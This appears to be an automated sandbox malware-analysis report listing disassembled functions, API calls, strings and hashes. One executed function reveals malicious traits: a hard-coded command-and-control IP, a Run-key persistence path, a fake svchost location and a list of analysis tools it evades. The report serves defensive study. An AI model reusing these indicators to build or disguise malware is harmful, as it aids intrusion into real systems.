Instruction Fuzzy Hash: 97A169332187C096C726CB29E2443AEBBA0F355708F44910BEBC987B95D77CC6A6C709

Function 00410E70 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,-0000000F,0041023D), ref: 00410F01
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,-0000000F,0041023D), ref: 00410F17
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,-0000000F,0041023D), ref: 00410F8F
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,-0000000F,0041023D), ref: 0041103B
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,-0000000F,0041023D), ref: 00411079

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: d7243f8119c80cb6caf18a02b1820350ee005c739c529f491a7ee56cf1a00cdc
Instruction ID: c680beda46c8cb030d9688ca0a12deeaedf4cc7ece848ab808a4533fd3e407c7
Opcode Fuzzy Hash: d7243f8119c80cb6caf18a02b1820350ee005c739c529f491a7ee56cf1a00cdc
Instruction Fuzzy Hash: ED816072210BC08AD720CF26E8403DA77A9F748BE8F14861AEB5947FA8DF78C595C744

Function 0040FAB0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0040FADB

Part of subcall function 0040FE50: Sleep.KERNEL32 ref: 0040FE84

GetFileType.KERNEL32 ref: 0040FC36

Strings

@, xrefs: 0040FD1F

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID: @
API String ID: 1527402494-2766056989
Opcode ID: 014c71ca7a808ea008ab556e9db22d3acff582b1edc560e95c126646fa596dc7
Instruction ID: d8d49160160baa158975f07009d68571a08deae34f04f8e54ca1732d5cc59113
Opcode Fuzzy Hash: 014c71ca7a808ea008ab556e9db22d3acff582b1edc560e95c126646fa596dc7
Instruction Fuzzy Hash: 7B71DE71308B8481E7208B25E85436937A0F705BB4F65433ADABE57BD1DB3CD84AC74A

Function 00408148 Relevance: 9.2, APIs: 6, Instructions: 191comCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,004067D6), ref: 004081B7
CoCreateInstance.OLE32(?,?,?,?,?,?,?,00000000,?,?,?,004067D6), ref: 004081ED
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,00000000,?,?,?,004067D6), ref: 00408247
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,00000000,?,?,?,004067D6), ref: 00408281
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,00000000,?,?,?,004067D6), ref: 004082BB
LoadIMAGE.HCCUTILS(?,?,?,?,?,?,?,00000000,?,?,?,004067D6), ref: 004082F5

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Load$CloseCreateHandleInstance
String ID:
API String ID: 2504591048-0
Opcode ID: 6e9474882128928562c43ddecf874efa11d652e0419d1f6279c74e28423c51de
Instruction ID: 0ecc235303d80a3ac9aa68f59082f89cc73178505826f14217a8bdeb74a25897
Opcode Fuzzy Hash: 6e9474882128928562c43ddecf874efa11d652e0419d1f6279c74e28423c51de
Instruction Fuzzy Hash: 4D817676204B8186CB24DF6AE6506EEB7A1F384B88F18412ADBDA13791DF3CD586C744

Function 00410000 Relevance: 9.2, APIs: 6, Instructions: 161COMMON

Download Yara Rule

APIs

GetStringTypeW.KERNEL32 ref: 00410070
GetLastError.KERNEL32 ref: 0041008D
MultiByteToWideChar.KERNEL32 ref: 00410111
MultiByteToWideChar.KERNEL32 ref: 004101B4
GetStringTypeW.KERNEL32 ref: 004101CA

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ByteCharMultiStringTypeWide$ErrorLast
String ID:
API String ID: 3581945363-0
Opcode ID: 9340e80f29a1e57405653967e58a07cac4bd63a09c66be6720d3dca30f9fbbcc
Instruction ID: c8bcd652a4239e553752f109d562fac1c378b6d3f43f8fef50a9642d46120b0d
Opcode Fuzzy Hash: 9340e80f29a1e57405653967e58a07cac4bd63a09c66be6720d3dca30f9fbbcc
Instruction Fuzzy Hash: F8619D76704B908ACB20CF26E8407DA37A1F748BD8F54412AEE4987B58DB7DCAD5C748

Function 004023F0 Relevance: 8.9, APIs: 7, Instructions: 107COMMON

Download Yara Rule

APIs

CharNextA.USER32 ref: 00402416
CharNextA.USER32 ref: 00402436
CharNextA.USER32 ref: 0040244C
CharNextA.USER32 ref: 0040245F
CharNextA.USER32 ref: 0040246E
CharNextA.USER32 ref: 004024B7
CharNextA.USER32 ref: 004024DC

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 8bdb87a113e9e05dba8a9649feb6fa44514f66e8c107d5083b54fd207e3462a4
Instruction ID: 7095f7f57d3a70acfc63633db320e9b8edf10e49d570b33c574e46a68f0e85b2
Opcode Fuzzy Hash: 8bdb87a113e9e05dba8a9649feb6fa44514f66e8c107d5083b54fd207e3462a4
Instruction Fuzzy Hash: 48419172A05A94A4EB235F39DA5836C7B915341FC9F488073CB8D663D9DAFC84C6C31A

Function 00402940 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 00402952
GetWindowLongA.USER32 ref: 00402965
GetWindowLongA.USER32 ref: 00402979
SetWindowLongA.USER32 ref: 0040298F

Strings

Progman, xrefs: 00402949

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Window$Long$Find
String ID: Progman
API String ID: 750683062-3542350831
Opcode ID: 37b3f79331ab0c466837a7708e1400b8a063963f77d97d3bacdb49b673bb6056
Instruction ID: 3bd76aed20d294887ff6911452275273e2c04e09f3e77ecdfd591c6045855f0b
Opcode Fuzzy Hash: 37b3f79331ab0c466837a7708e1400b8a063963f77d97d3bacdb49b673bb6056
Instruction Fuzzy Hash: 26E092B070160442EE085B76686876622515FCAF61F4A5631AD374A3D4CF3CC0D9C30C

Function 0040E140 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0040E14F
GetProcAddress.KERNEL32 ref: 0040E164
ExitProcess.KERNEL32 ref: 0040E175

Strings

CorExitProcess, xrefs: 0040E15A
mscoree.dll, xrefs: 0040E148

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 1aa337e039c50e8e690dc0a99b259f23f282083622cfe5f67c870ad061d34cbd
Instruction ID: be608d1a9bb46566dbe680df13585a471a655f3736049b15392bf7ee33ee95ec
Opcode Fuzzy Hash: 1aa337e039c50e8e690dc0a99b259f23f282083622cfe5f67c870ad061d34cbd
Instruction Fuzzy Hash: 22E017B030170082EF08AF61AC947A82370AB98B40F49187D8A1F063B0EEBCC8D9C35C

Function 00401E0C Relevance: 7.6, APIs: 5, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E6C
GetSystemInfo.KERNEL32 ref: 00401E7F
VirtualQuery.KERNEL32 ref: 00401EC8

Part of subcall function 00401DA8: GetVersionExA.KERNEL32 ref: 00401DDD

VirtualAlloc.KERNEL32 ref: 00401F10
VirtualProtect.KERNEL32 ref: 00401F38

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Virtual$Query$AllocInfoProtectSystemVersion
String ID:
API String ID: 2386347326-0
Opcode ID: c48610ac1ecd6cc3c6df5739c2e3d44f922b0fb580b480188fbbe817a446840e
Instruction ID: 53994b95074d1890792621b4ad70f1d9b25533b159dcc7422d8c88fa869bb32d
Opcode Fuzzy Hash: c48610ac1ecd6cc3c6df5739c2e3d44f922b0fb580b480188fbbe817a446840e
Instruction Fuzzy Hash: 2731D07A3116509AEB20DF26E9407CD6B60F748BDCF444426EE0A57BA8CB3CD58AC748

Function 00411680 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,0040E687), ref: 004116BF
GetProcAddress.KERNEL32(?,0040E687), ref: 004116D4

Strings

kernel32.dll, xrefs: 004116B8
InitializeCriticalSectionAndSpinCount, xrefs: 004116CA

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 1646373207-3733552308
Opcode ID: a6fe1eed7c15e8e275b654682b0d15b2bed0f7f8625e4ed14c123073aee2ac0b
Instruction ID: 30d9de444b69f12a069ca94915d0c9f02e0f5e9d5d58ff3eee34bd869671ba0f
Opcode Fuzzy Hash: a6fe1eed7c15e8e275b654682b0d15b2bed0f7f8625e4ed14c123073aee2ac0b
Instruction Fuzzy Hash: E711C2B420AB4096EA00DF85F8903D563A4B789790F98043ADB5E83774EF7CD5DAD708

Function 004046F0 Relevance: 6.1, APIs: 4, Instructions: 56registrystringCOMMON

Download Yara Rule

APIs

SysStringLen.OLEAUT32 ref: 0040473D
lstrlenW.KERNEL32 ref: 00404767
RegisterTypeLib.OLEAUT32 ref: 004047A8
SysFreeString.OLEAUT32 ref: 004047C6

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: String$FreeRegisterTypelstrlen
String ID:
API String ID: 3968977490-0
Opcode ID: b264a044a6df5322baed35438de046b7103d887cdd211851e1a069e7dff0817c
Instruction ID: a7606c59ac0e97de63b6674dc3e3044fc89045c7dfda5d700b3e6c1bbe7f655d
Opcode Fuzzy Hash: b264a044a6df5322baed35438de046b7103d887cdd211851e1a069e7dff0817c
Instruction Fuzzy Hash: A9212F76218A8482DB30DB15F89439AA370F7C9B98F500226EBAD97BA5CF3CC545CB04

Function 0040D136 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 0040D168
RaiseException.KERNEL32 ref: 0040D182

Strings

csm, xrefs: 0040D1B6

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: 686ae8a3224af9647718aa83000a3a8e99fe9ea8da338b4678acbd100c36bc23
Instruction ID: 87b62642e3dc5083b8055931c5f312a3f6145b63e8dccec12c144c86d3b0190b
Opcode Fuzzy Hash: 686ae8a3224af9647718aa83000a3a8e99fe9ea8da338b4678acbd100c36bc23
Instruction Fuzzy Hash: 9231243A604A80C2C630DF12E44075EB325F389B94F544226EF9E67BA8CF3DD949CB49

Function 004064EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconA.SHELL32 ref: 00406560
DestroyIcon.USER32 ref: 00406570

Strings

h, xrefs: 0040650C

Memory Dump Source

Source File: 00000004.00000002.2090415214.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2090404570.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090431008.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090445225.000000000041C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2090460230.0000000000422000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_8AfroU.jbxd

Similarity

API ID: Icon$DestroyNotifyShell_
String ID: h
API String ID: 687866923-2439710439
Opcode ID: 7adc3286d4fa6ef8920ed1c556a6d69d0eb4e6d8c314114e1b0a40ccb524eb6e
Instruction ID: 6c2f3861db7814ca8f3fb273c78744e670e784b1e82765e5058b7e8a5d94dc22
Opcode Fuzzy Hash: 7adc3286d4fa6ef8920ed1c556a6d69d0eb4e6d8c314114e1b0a40ccb524eb6e
Instruction Fuzzy Hash: 26017CB6718B8486E7209F15E98835DB3A5F798BC4F405029EB8D47B98DF3DC899CB04

Analysis Process: lXAMaI.exePID: 6852, Parent PID: 4452COMMON

Execution Graph

Execution Coverage:	3.5%
Dynamic/Decrypted Code Coverage:	92%
Signature Coverage:	12.8%
Total number of Nodes:	792
Total number of Limit Nodes:	35

Executed Functions

Function 1000AFA5 Relevance: 140.5, APIs: 37, Strings: 43, Instructions: 526
filethreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNEL32(C:\del), ref: 1000AFB5
DeleteFileA.KERNEL32(C:\tzfz), ref: 1000AFC0
DeleteFileA.KERNEL32(C:\1.ini), ref: 1000AFCB
DeleteFileA.KERNEL32(C:\2.ini), ref: 1000AFD6
DeleteFileA.KERNEL32(c:\xxxx.ini), ref: 1000AFE1
DeleteFileA.KERNEL32(C:\xxxx.ini), ref: 1000AFEC
DeleteFileA.KERNEL32(C:\xxxx.inst.ini), ref: 1000AFF7
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log), ref: 1000B002

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000006,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002431

Part of subcall function 1000241C: SetFileAttributesA.KERNEL32(?,00000080,?,1000B014,C:\ProgramData\Microsoft\Program\xxxxxx.jpg,00000001), ref: 10002442

CreateThread.KERNEL32(00000000,00000000,10009668,00000000,00000000,00000000), ref: 1000B204
CreateThread.KERNEL32(00000000,00000000,10009F97,00000000,00000000,00000000), ref: 1000B222
CreateThread.KERNEL32(00000000,00000000,1000A1A7,00000000,00000000,00000000), ref: 1000B240
CreateThread.KERNEL32(00000000,00000000,1000AF41,00000000,00000000,00000000), ref: 1000B255
CreateThread.KERNEL32(00000000,00000000,1000AEDB,00000000,00000000,00000000), ref: 1000B26A
WSAStartup.WS2_32(00000002,?), ref: 1000B3A7
socket.WS2_32(00000002,00000001,00000000), ref: 1000B3B3
GetCurrentThreadId.KERNEL32 ref: 1000B3C8
Sleep.KERNEL32(00001388), ref: 1000B814

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log, xrefs: 1000AFFD
iiiiiiiiiiiiiiii.exe, xrefs: 1000B2BB
360tray.exe, xrefs: 1000B2EA
Mozilla/4.0 (compatible), xrefs: 1000B490
C:\ProgramData\Microsoft\Program, xrefs: 1000B073
C:\xx.exe, xrefs: 1000B0CD
PowerTool, xrefs: 1000B15F
C:\ProgramData\Microsoft\iXXX3XXX.exe, xrefs: 1000B046
C:\ProgramData\Microsoft\xxxxxxxx.dat, xrefs: 1000B055
C:\ProgramData\xxx.rar, xrefs: 1000B0EB
C:\Microsoft\xxxxxxxx.exe, xrefs: 1000B028
OllyDbg, xrefs: 1000B13B
C:\ProgramData\Program, xrefs: 1000B0A0
C:\2.ini, xrefs: 1000AFD1
c:\xxxx.ini, xrefs: 1000B2FD
C:\Microsoft\iXXX3XXX.dat, xrefs: 1000B019
C:\xxxx.inst.ini, xrefs: 1000AFF2
C:\1.ini, xrefs: 1000AFC6
http://%s/ip.txt, xrefs: 1000B4B3
C:\ProgramData\xxxx\xxx.exe, xrefs: 1000B0BE
c:\xxxx.ini, xrefs: 1000AFDC
iiiiiiiiiiiii.exe, xrefs: 1000B328
C:\Microsoft, xrefs: 1000B091
Sauron, xrefs: 1000B6A5, 1000B6D3, 1000B7CA
C:\del, xrefs: 1000AFB0
C:\Microsoft\XXXXX.xml, xrefs: 1000B037
C:\ProgramData\xxxx\xxx.rar, xrefs: 1000B0DC
C:\ProgramData\360EntDT, xrefs: 1000B082
XueTr, xrefs: 1000B117
Process Monitor, xrefs: 1000B14D
C:\tzfz, xrefs: 1000AFBB
c32asm, xrefs: 1000B129
C:\ProgramData\Microsoft\Program\xxxxxx.jpg, xrefs: 1000B00A
47.76.31.57, xrefs: 1000B394, 1000B3E9, 1000B4AE, 1000B53D, 1000B555
Sauronij Lmnopqrst Vwxyabc Efghijkl Nop, xrefs: 1000B7C0
C:\Windows\svchost.exe, xrefs: 1000B785
C:\ProgramData\Microsoft\XXXXX.xml, xrefs: 1000B064
360Tray.exe, xrefs: 1000B27D
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 1000B637
c:\xxxx.ini, xrefs: 1000B290
C:\ProgramData, xrefs: 1000B0AF
Sauron Jklmnopq Stuvwxya Cdef, xrefs: 1000B7C5
C:\xxxx.ini, xrefs: 1000AFE7

Memory Dump Source

Source File: 00000007.00000002.3511821369.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.3511799085.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511854264.0000000010027000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.000000001002D000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010052000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010057000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.3511881306.0000000010059000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_lXAMaI.jbxd

Yara matches

Similarity

API ID: File$Delete$Thread$Create$Attributes$CurrentSleepStartupsocket
String ID: 360Tray.exe$360tray.exe$47.76.31.57$C:\1.ini$C:\2.ini$C:\Microsoft$C:\Microsoft\XXXXX.xml$C:\Microsoft\iXXX3XXX.dat$C:\Microsoft\xxxxxxxx.exe$C:\ProgramData$C:\ProgramData\360EntDT$C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log$C:\ProgramData\Microsoft\Program$C:\ProgramData\Microsoft\Program\xxxxxx.jpg$C:\ProgramData\Microsoft\XXXXX.xml$C:\ProgramData\Microsoft\iXXX3XXX.exe$C:\ProgramData\Microsoft\xxxxxxxx.dat$C:\ProgramData\Program$C:\ProgramData\xxx.rar$C:\ProgramData\xxxx\xxx.exe$C:\ProgramData\xxxx\xxx.rar$C:\Windows\svchost.exe$C:\del$C:\tzfz$C:\xx.exe$C:\xxxx.ini$C:\xxxx.inst.ini$Mozilla/4.0 (compatible)$OllyDbg$PowerTool$Process Monitor$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Sauron$Sauron Jklmnopq Stuvwxya Cdef$Sauronij Lmnopqrst Vwxyabc Efghijkl Nop$XueTr$c32asm$c:\xxxx.ini$c:\xxxx.ini$c:\xxxx.ini$http://%s/ip.txt$iiiiiiiiiiiii.exe$iiiiiiiiiiiiiiii.exe
API String ID: 4100416622-230621266
Opcode ID: eaaae469d2a0a544373225410f7f013a36b0fd347ba73631f4cb4262b145393d
Instruction ID: df973298999380268d43f95649d5e93b2d63b3bf48238bf59aa25f5593139cbe
Opcode Fuzzy Hash: eaaae469d2a0a544373225410f7f013a36b0fd347ba73631f4cb4262b145393d
Instruction Fuzzy Hash: C212D974D84354BAFB20DB908C4BFD97660EB14741F2000A9F708B91C6DBB56AD8CB7A

Function 00431000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00431006
CreateMutexW.KERNEL32(00000000,00000000,Global\IEToolbarUninstaller), ref: 00431013
GetLastError.KERNEL32 ref: 0043101F
GetCommandLineW.KERNEL32(?), ref: 00431040
CommandLineToArgvW.SHELL32(00000000), ref: 00431047
PathFileExistsW.SHLWAPI(tbcore3.dll), ref: 00431061
PathFileExistsW.SHLWAPI(tbcore3U.dll), ref: 00431073
LoadLibraryW.KERNEL32(?), ref: 00431085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00431097
FreeLibrary.KERNEL32(00000000), ref: 004310A4
CloseHandle.KERNEL32(00000000), ref: 004310AB
CoUninitialize.OLE32 ref: 004310B1
LocalFree.KERNEL32(00000000), ref: 004310BC

Strings

MyUnregisterServer, xrefs: 00431091
Global\IEToolbarUninstaller, xrefs: 0043100C
tbcore3U.dll, xrefs: 0043106E, 00431079
tbcore3.dll, xrefs: 0043105C, 00431067

Memory Dump Source

Source File: 00000007.00000002.3502605528.0000000000431000.00000020.00000001.01000000.00000009.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.3502562365.0000000000430000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502638996.0000000000438000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502674482.000000000043A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3502714188.000000000043C000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_lXAMaI.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: d12980ec3f168b6961d840a67b8ba32dd7cbfde4773bf5368768974bcf737da6
Instruction ID: f7ac250bd0f52a075cfc6ee62f85f8f10a37f00300148976b70f36844e7bd194
Opcode Fuzzy Hash: d12980ec3f168b6961d840a67b8ba32dd7cbfde4773bf5368768974bcf737da6
Instruction Fuzzy Hash: 3A112472505361AB83246B60AC08A9FB7B8EA0C721F01283FF942D2560CF688D05C6BE

Function 035A10A0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

RpcStringBindingComposeW.RPCRT4(035B8850,ncacn_np,localhost,035B889C,00000000,?), ref: 035A10DB
RpcBindingFromStringBindingW.RPCRT4(?,?), ref: 035A10E9
RpcBindingSetAuthInfoExA.RPCRT4(?,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 035A111D
RpcStringFreeW.RPCRT4(?), ref: 035A1127

Strings

i}v, xrefs: 035A10E9
ncacn_np, xrefs: 035A10D0
localhost, xrefs: 035A10CB

Memory Dump Source

Source File: 00000007.00000002.3509857649.00000000035A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_35a0000_lXAMaI.jbxd

Similarity

API ID: Binding$String$AuthComposeFreeFromInfo
String ID: localhost$ncacn_np$i}v
API String ID: 1126441048-2003718969
Opcode ID: e6618f6895998990f454fad2f0939d09cdb9a9105a1a7c48846eb61cdd69df4e
Instruction ID: 29326eee22084ec5595dc5f66f3caedea5d0715850b29320807fa60ead091dc7
Opcode Fuzzy Hash: e6618f6895998990f454fad2f0939d09cdb9a9105a1a7c48846eb61cdd69df4e
Instruction Fuzzy Hash: 50113DB4E00209AFDB40DFA4D846FEEBBB8FB08700F108519E615AB280E7B566059B90

Function 00410565 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 440COMMON

Download Yara Rule

Strings

